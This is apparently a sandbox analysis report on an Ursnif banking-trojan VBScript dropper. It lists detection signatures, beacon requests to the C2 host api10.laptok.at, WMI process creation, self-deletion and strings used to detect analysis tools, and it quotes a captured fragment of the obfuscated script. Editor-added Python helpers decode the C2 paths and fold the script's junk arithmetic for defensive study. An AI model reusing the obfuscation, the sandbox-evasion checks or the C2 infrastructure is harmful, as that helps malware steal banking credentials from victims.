Analysis Report g1JrwtyGnJZN.vbs

Overview

General Information

Sample Name: g1JrwtyGnJZN.vbs
Analysis ID: 285986
MD5: b4e143c33ff5185caaf368c408a0a478
SHA1: 9765f19b1e7763014c24e3a1481f7e54ec2ff3a2
SHA256: 0cd0d289b0dd3c1db6220a8355e8983f3fc1c0b1a4e235821940d5d4b00903ee

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\mitt.xml Virustotal: Detection: 13%
Multi AV Scanner detection for submitted file
Source: g1JrwtyGnJZN.vbs Virustotal: Detection: 14%
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/eo3ZSWZV8_2FxYajjF6/fHlrjUKxIkrzJk0PKU41tB/9viqg0M9rFKki/O93z5JnJ/aE25PJZ6HcbryFTSW3W3sQa/aFBMV9j6DK/l16EaOC0MRKNYrw3B/E4v_2FH8pejn/GV7imX1AvF1/MYFUtWbdxOdAq2/xw_2BwtuIrZ1MQqzMU8Bb/uZfwJ8uos0jGz_2F/hNaNpgPpl8Pmilm/vuSJz4SSv_2FQL6RUG/fdMCySM74/xJeXsEj_2FbxfgSe5fIZ/NZZIO5cG3ful2x_2B_2/B_0A_0Dail8I3TU14ZyHLH/RZ5F7bNt3xC_2/BJzzLSuF0QhT/qGaqWpZO_2/B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/UmG5IvP0SycsHKM/ncTup1roRg_2FcqVx_/2FxfMW1eV/eDcK7yxaawWtE7uWmMxP/plka9B_2BSLHhm80wi8/3MuGAu_2B3RB_2FW4vcdbS/iV_2Fbxv1yHbP/fA8OzswY/7wZW8zbmzFAODqXmwu7iNqi/tg8quvSV39/BmQ6Sf12QDk48748t/tbSrZ8J5B13k/VAVFEGivAeY/wpOD7_2FX818Wo/Zq4bAK_2FSitKN5mbXTWV/_2FQMHJ0q7VCD519/uynq39HfJONxPSr/AnR45wQ_0A_0DuRQpL/0y2TKpWn4/4OoIh3WEDc8_2BsZo_2B/bZOoauW3lax_2FeyXqJ/DRbAFcBrKzWW044P7Td_2/B5 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/ohotMIGX9kln_2F5xUI4iT/2bGyyUWD78H6K/n_2B4I6M/7xntC5wUCLe31nX0dCJGF0v/2vCTzrIZHZ/K1STpJpCyA2jBSd7z/E4RhXF8uKsw8/p5H7BeLQSKd/DvcLTJT1DJ9_2F/Zcg88g7SsZiON4oXSHB9V/hwGeNfal1JjWeaiT/uHQK6B3gg9f5zkA/vj_2F7ExNsUJQGzxar/cv9DCbI7b/aWm1IqK7QmWqcZY2YWxj/DzvBfLFJUsfmQgTxF3H/PJCDcGt4uflg_0A_0DX955/nBJdXg6Qra50q/k2tYlz56/T1PkuxZbwwHs8JeDPAGBRe7/7CY_2BeSt0/W_2B_2BZe/dc7XdtN HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml0.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x013e9ce8,0x01d68beb</date><accdate>0x013e9ce8,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x013e9ce8,0x01d68beb</date><accdate>0x0140fe0b,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x0145c215,0x01d68beb</date><accdate>0x0145c215,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x0145c215,0x01d68beb</date><accdate>0x0145c215,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x01482630,0x01d68beb</date><accdate>0x01482630,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.20.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x01482630,0x01d68beb</date><accdate>0x01482630,0x01d68beb</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Sep 2020 20:33:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Note: the Data Ascii column is not readable content. The body is chunked ("36 61 0d 0a" is the chunk-size line, 0x6a = 106 bytes) and the chunk starts with 1f 8b 08, the gzip magic; the gzip trailer's ISIZE field (92 00 00 00) gives 146 bytes uncompressed, which is exactly the size of the stock nginx 404 page. The server therefore returned no C2 data to these three requests in this run.
Source: {45EE70DA-F7DE-11EA-90E3-ECF4BB82F7E0}.dat.26.dr, ~DFDD3758D86AF3E652.TMP.26.dr String found in binary or memory: http://api10.laptok.at/api1/UmG5IvP0SycsHKM/ncTup1roRg_2FcqVx_/2FxfMW1eV/eDcK7yxaawWtE7uWmMxP/plka9B
Source: {2B684CD2-F7DE-11EA-90E3-ECF4BB82F7E0}.dat.20.dr String found in binary or memory: http://api10.laptok.at/api1/eo3ZSWZV8_2FxYajjF6/fHlrjUKxIkrzJk0PKU41tB/9viqg0M9rFKki/O93z5JnJ/aE25PJ
Source: msapplication.xml.20.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.20.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.20.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.20.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.20.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.20.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.20.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.20.dr String found in binary or memory: http://www.youtube.com/
Note: the msapplication.xml*.dr files are Internet Explorer's own pinned-site cache, written when the iexplore.exe processes listed under System Summary start. The facebook/twitter/youtube/amazon/google/live/nytimes/reddit/wikipedia URLs in them are not indicators of this sample; the report records no traffic to them. The network indicators of this run are the DNS query and the three GET requests to api10.laptok.at, plus their 404 replies.
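The three GET requests above share one path format: a short fixed prefix (/api1/), then a long run of random-length segments made only of base64 characters and `_XX` escapes (`_2F`, `_2B`, `_0A_0D`), with an escape sometimes split across a `/` (`..._2/B5`, `...Vx_/2Fxf...`). The script below is an editor-added example, not code from the report or from the malware: it joins the segments, decodes the escapes back to base64, and checks that the result decodes to a whole number of 16-byte blocks, which is what a block-cipher-encrypted request body would give. The meaning of the escapes, the fixed first segment and the 16-byte block size are assumptions taken from public Ursnif write-ups rather than from this page; the three paths are copied verbatim from the requests above, and the control paths are constructed.

```python
"""Normalise and flag Ursnif-style C2 request paths (editor-added example).

Assumptions (from public Ursnif write-ups, not from this report): the request
data is base64, chopped into path segments of random length, non-URL-safe
bytes are written as '_' plus two hex digits ('_2F' = '/', '_2B' = '+',
'_0A'/'_0D' = line-wrap LF/CR), '=' padding is dropped, and the first path
segment ('api1' here) is a fixed prefix.
"""
import base64
import binascii
import re
from typing import Optional

# Copied verbatim from the three GET requests in this report (Host: api10.laptok.at).
OBSERVED_PATHS = [
    "/api1/eo3ZSWZV8_2FxYajjF6/fHlrjUKxIkrzJk0PKU41tB/9viqg0M9rFKki/O93z5JnJ/aE25PJZ6HcbryFTSW3W3sQa/aFBMV9j6DK/l16EaOC0MRKNYrw3B/E4v_2FH8pejn/GV7imX1AvF1/MYFUtWbdxOdAq2/xw_2BwtuIrZ1MQqzMU8Bb/uZfwJ8uos0jGz_2F/hNaNpgPpl8Pmilm/vuSJz4SSv_2FQL6RUG/fdMCySM74/xJeXsEj_2FbxfgSe5fIZ/NZZIO5cG3ful2x_2B_2/B_0A_0Dail8I3TU14ZyHLH/RZ5F7bNt3xC_2/BJzzLSuF0QhT/qGaqWpZO_2/B",
    "/api1/UmG5IvP0SycsHKM/ncTup1roRg_2FcqVx_/2FxfMW1eV/eDcK7yxaawWtE7uWmMxP/plka9B_2BSLHhm80wi8/3MuGAu_2B3RB_2FW4vcdbS/iV_2Fbxv1yHbP/fA8OzswY/7wZW8zbmzFAODqXmwu7iNqi/tg8quvSV39/BmQ6Sf12QDk48748t/tbSrZ8J5B13k/VAVFEGivAeY/wpOD7_2FX818Wo/Zq4bAK_2FSitKN5mbXTWV/_2FQMHJ0q7VCD519/uynq39HfJONxPSr/AnR45wQ_0A_0DuRQpL/0y2TKpWn4/4OoIh3WEDc8_2BsZo_2B/bZOoauW3lax_2FeyXqJ/DRbAFcBrKzWW044P7Td_2/B5",
    "/api1/ohotMIGX9kln_2F5xUI4iT/2bGyyUWD78H6K/n_2B4I6M/7xntC5wUCLe31nX0dCJGF0v/2vCTzrIZHZ/K1STpJpCyA2jBSd7z/E4RhXF8uKsw8/p5H7BeLQSKd/DvcLTJT1DJ9_2F/Zcg88g7SsZiON4oXSHB9V/hwGeNfal1JjWeaiT/uHQK6B3gg9f5zkA/vj_2F7ExNsUJQGzxar/cv9DCbI7b/aWm1IqK7QmWqcZY2YWxj/DzvBfLFJUsfmQgTxF3H/PJCDcGt4uflg_0A_0DX955/nBJdXg6Qra50q/k2tYlz56/T1PkuxZbwwHs8JeDPAGBRe7/7CY_2BeSt0/W_2B_2BZe/dc7XdtN",
]

_ESCAPE = re.compile(r"_([0-9A-Fa-f]{2})")      # '_XX' -> the byte 0xXX
_B64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+")
_SEGMENT = re.compile(r"[A-Za-z0-9_]+")


def normalize_path(path: str) -> Optional[str]:
    """Rebuild the base64 blob from a request path.

    Segments are joined *before* escapes are decoded: the sample splits an
    escape across a '/', so decoding per segment would leave underscores
    behind.  The first segment is treated as a fixed prefix and discarded.
    """
    segments = [s for s in path.split("/") if s]
    if len(segments) < 2:
        return None
    joined = "".join(segments[1:])
    decoded = _ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), joined)
    decoded = decoded.replace("\r", "").replace("\n", "")   # drop the line-wrap bytes
    return decoded if _B64_ALPHABET.fullmatch(decoded) else None


def decode_payload(path: str) -> Optional[bytes]:
    """Return the raw (still encrypted) request bytes, or None if the path
    does not normalise to well-formed base64."""
    b64 = normalize_path(path)
    if b64 is None or len(b64) % 4 == 1:       # no base64 string is 1 mod 4 long
        return None
    b64 += "=" * (-len(b64) % 4)               # restore the stripped padding
    try:
        return base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None


def looks_like_ursnif(path: str, min_segments: int = 6, block_size: int = 16) -> bool:
    """Heuristic for the URL format seen in this report: many alphanumeric/
    underscore segments, at least one decoded escape, and a payload that is a
    non-empty multiple of the (assumed) 16-byte cipher block size."""
    segments = [s for s in path.split("/") if s]
    if len(segments) < min_segments or not all(_SEGMENT.fullmatch(s) for s in segments):
        return False
    b64 = normalize_path(path)
    if b64 is None or ("/" not in b64 and "+" not in b64):   # no '_2F'/'_2B' escapes at all
        return False
    payload = decode_payload(path)
    return payload is not None and len(payload) >= block_size and len(payload) % block_size == 0


if __name__ == "__main__":
    for p in OBSERVED_PATHS + ["/api/v1/users/123/profile"]:   # last one is a constructed control
        payload = decode_payload(p)
        size = len(payload) if payload is not None else None
        print(f"{looks_like_ursnif(p)!s:5}  payload_bytes={size}  {p[:40]}...")
```

All three observed paths normalise to clean base64 (299, 320 and 320 characters) and decode to 224, 240 and 240 bytes, each a multiple of 16, which is consistent with the block-cipher assumption; the decoded bytes are still ciphertext, so this is a detector and a pre-processing step for further analysis, not a decryptor.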

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.374917949.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374965173.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375131455.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375076208.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375019084.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375052638.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375106065.0000000005F18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.374881128.0000000005F18000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match (the same eight 00000004.00000003.*.0000000005F18000 memory dumps listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

System Summary:

Java / VBScript file with very long strings (likely obfuscated code)
Source: g1JrwtyGnJZN.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winVBS@7/40@3/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user~1\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\g1JrwtyGnJZN.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policy lookup made by the script host itself, not by the script)
Source: g1JrwtyGnJZN.vbs Virustotal: Detection: 14%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\g1JrwtyGnJZN.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7036 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3920 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7036 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3920 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (the VBScript engine's CLSID; expected for any .vbs run by wscript.exe)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync
Source: g1JrwtyGnJZN.vbs Static file information: File size 1343211 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\12\fill\55\Port\Hair\ice\61\Art\4\6\13\may\84\Boat\2\West.pdb source: mitt.xml.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(174306601)) > 0 And Kruger = 0) ThenExit FunctionEnd Iffilmmake = ((99 + 90.0) - (78 + (213 - 105.0)))' art Catherine probationary. warden397 Gustavus crusade magnet monolith81 encroach deoxyribonucleic potpourri IR731, guild. fictive erect67 mammary Oedipus955 digress ornamentation alpaca, 3149952 comptroller baste366. 4124438 telekinesis570 Plato Watson Ogden courage broaden368 kid Allah facetious Crawford Hartley691 Britten, tripod perfect freehold635 rennet. 788855 systematic. 3587675 plural amide probosces accumulate110. 1365465 classify283 chromatin. fiesta droop vinyl471 lint107 knurl Cyril chamberlain sex378 ivy northernmost abjure greylag762, tate hamper linseed rho. Ethiopia893. rim Moulton leech ovipositor apotheosis106 greengrocer gluey fulsome deceptive scientific promulgate Atropos hungry sag pyknotic461 indices295 eastward disjunct816, Fontainebleau demi commit deodorant bogy swain rickshaw stormbound238 innumerable glorious purgatory silt Darius filmmake_download = (65 + (-(63 - ((78 + (-38.0)) + (-39.0)))))If CreateObject("Scripting.FileSystemObject").GetFolder(triode).Files.Count < filmmake ThenREM accelerometer Andromache firemen errata peppy grateful rail proboscis alpaca48 Valparaiso fragment singable Gorham Rowe901 citizenry isopleth sexual crepe699 Mullen851 esplanade mansion insouciant locomotive theyre631 intimate tycoon, thimbleful coincident seedbed Sci dietary895 lick radiography meat Aries sentinel Atropos12 frazzle351, April legato. 4003764 pillage Reginald pontific, pacifist bogus medicinal742 senior684, 2072838 thousand, 989632 swatch Bradford embassy leftmost bane barbarism betony liar166 bongo grab autoclave Frenchmen sparrow catchup192 Jonas shalom88 bedimming8 formic Islamabad802 jackboot. 2354640 big semblance Pliny583. newscast786, 2906167 Fleming. 
curious leachate barn609 prexy healthful boa larkspur Pentecost magnetic, Hetman inequitable ranch woodcarver ninth202 peregrine748 crevice bettor856 botulism526 Segundo convulsion convince Roosevelt McGowan stamen McNally EiRhJIUREM plank miscellaneous Rutland McKinney410 vacuous eightieth presto Doherty medley nirvana littoral cornerstone beak emerge airplane Casanova squamous bite blackmail abutted coast stairway centrifugate582 bruit. clitoris promote gaze humus congruent275. PhD Alger Nostrand dentition Dowling eruption business, mantle CRT616 had odious lea sheaf snippy madam delight. 6703318 clothe actual, becalm rhyme merge. David acrobatic Fischer365 colic inflect jittery fife chuckle sally primrose mustard daffodil ONeill casserole bristlecone irrevocable formal vinaigrette Watkins fed CRT855 pantheon mortify. 189420 ford electrocardiogram McKenzie woke embargo fillet Elysee lavatory bag coextensive344 ridicule patron MacMahon855, AR693 gavotte spheroid matriarchy Goff immerse. heir bazaar274 Armata traversal protege snick End IfSet Castillo213 = CreateObject("WScript.Shell")patroness877 = Castillo213.ExpandEnvironment
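The AMSI capture above shows the two layers that have to be stripped before the script is readable: junk prose in `'` and `REM` comments, and constants hidden as nested arithmetic (`filmmake = ((99 + 90.0) - (78 + (213 - 105.0)))` is just 3). The helper below is an editor-added example, not the sample's code and not part of the Joe Sandbox report: it removes the comments and folds the arithmetic with a whitelisted AST evaluator, so nothing from the script is ever executed. `SAMPLE_VBS` is constructed from the statements visible in the capture with line breaks restored; the first statement, which the capture cuts off mid-expression, is completed to an `If ... Then` as an assumption.

```python
"""Strip junk comments and fold constant arithmetic in obfuscated VBScript.

Editor-added example.  SAMPLE_VBS is constructed: it restores line breaks to
the statements visible in the AMSI capture of this report; the first line is
completed to an If/Then as an assumption (the capture starts mid-expression).
"""
import ast
import re
from typing import Dict, List, Union

SAMPLE_VBS = """\
If InStr(WScript.ScriptName, cStr(174306601)) > 0 And Kruger = 0 Then
    Exit Function
End If
filmmake = ((99 + 90.0) - (78 + (213 - 105.0)))
' art Catherine probationary. warden397 Gustavus crusade magnet monolith81
filmmake_download = (65 + (-(63 - ((78 + (-38.0)) + (-39.0)))))
If CreateObject("Scripting.FileSystemObject").GetFolder(triode).Files.Count < filmmake Then
REM accelerometer Andromache firemen errata peppy grateful rail proboscis
End If
Set Castillo213 = CreateObject("WScript.Shell")
"""

# A parenthesised run of digits, operators and nested parens whose opening
# '(' is not preceded by an identifier character (so call argument lists such
# as cStr(174306601) and GetFolder(triode) are never touched).
_NUMERIC_PARENS = re.compile(r"(?<!\w)\((?:[\d.\s+\-*/()])+\)")
_REM = re.compile(r"^\s*REM\b", re.IGNORECASE)
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(-?\d+(?:\.\d+)?)\s*$")

_BINOPS = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b,
           ast.Mult: lambda a, b: a * b, ast.Div: lambda a, b: a / b}


def strip_comment(line: str) -> str:
    """Drop REM lines and everything after an apostrophe outside a string."""
    if _REM.match(line):
        return ""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i].rstrip()
    return line


def _eval_const(node: ast.AST) -> Union[int, float]:
    """Evaluate an AST containing only numbers, unary +/- and + - * /.
    Names, calls and everything else raise, so script code never runs."""
    if isinstance(node, ast.Expression):
        return _eval_const(node.body)
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.USub, ast.UAdd)):
        value = _eval_const(node.operand)
        return -value if isinstance(node.op, ast.USub) else value
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](_eval_const(node.left), _eval_const(node.right))
    raise ValueError("not a constant arithmetic expression")


def _format(value: Union[int, float]) -> str:
    return str(int(value)) if float(value).is_integer() else repr(value)


def fold_constants(line: str) -> str:
    """Replace each constant arithmetic expression on the line by its value."""
    def replace(match) -> str:
        text = match.group(0)
        if not re.search(r"[+\-*/]", text):      # bare "(123)" is an argument, not arithmetic
            return text
        try:
            return _format(_eval_const(ast.parse(text, mode="eval")))
        except (SyntaxError, ValueError, ZeroDivisionError):
            return text                           # unbalanced or not purely numeric: leave as is
    return _NUMERIC_PARENS.sub(replace, line)


def deobfuscate(source: str) -> List[str]:
    """Comment-stripped, constant-folded, non-blank lines of the script."""
    out = []
    for raw in source.splitlines():
        line = fold_constants(strip_comment(raw))
        if line.strip():
            out.append(line)
    return out


def numeric_assignments(lines: List[str]) -> Dict[str, Union[int, float]]:
    """Collect 'name = <number>' lines; after folding these are the script's
    real thresholds (here the file count its sandbox check compares against)."""
    found: Dict[str, Union[int, float]] = {}
    for line in lines:
        m = _ASSIGN.match(line)
        if m:
            text = m.group(2)
            found[m.group(1)] = float(text) if "." in text else int(text)
    return found


if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE_VBS)
    print("\n".join(cleaned))
    print(numeric_assignments(cleaned))
```

Folded, the captured check reads `... GetFolder(triode).Files.Count < 3 Then`: the script compares the number of files in the folder held in `triode` against 3, a low-activity test aimed at clean sandbox images (the capture does not show what the branch does; only the ScriptName check visibly ends in `Exit Function`). `filmmake_download` folds to 3 as well.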

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Note: a process started through Win32_Process::Create is launched by the WMI provider host, so in process-tree telemetry its parent is WmiPrvSE.exe rather than wscript.exe. Hunt on WmiPrvSE.exe spawning non-WMI children, or on the ExecMethod call itself, rather than on a wscript.exe parent.
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\mitt.xml
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\mitt.xml

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match (the same eight 00000004.00000003.*.0000000005F18000 memory dumps listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\g1jrwtygnjzn.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 times)

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: EMUL.EXEE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
